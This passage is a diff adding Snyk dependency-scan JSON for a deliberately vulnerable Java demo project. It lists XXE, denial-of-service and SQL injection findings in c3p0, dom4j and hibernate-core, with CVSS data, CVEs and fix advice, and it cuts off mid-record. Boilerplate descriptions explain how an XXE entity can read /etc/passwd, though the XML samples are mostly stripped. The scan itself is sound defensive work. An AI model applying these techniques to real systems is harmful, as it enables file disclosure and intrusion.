"GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { 
+ "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "No known vulnerabilities", + "filesystemPolicy": false, + "uniqueCount": 0, + "projectName": "io.github.snyk:todolist-mvc", + "foundProjectCount": 7, + "displayTargetFile": "todolist-goof/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + 
"cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. 
Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for 
augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + 
"severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": 
"2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + 
], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-core@5.1.17.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. 
These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-core@5.1.17.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + 
"isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. 
This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + 
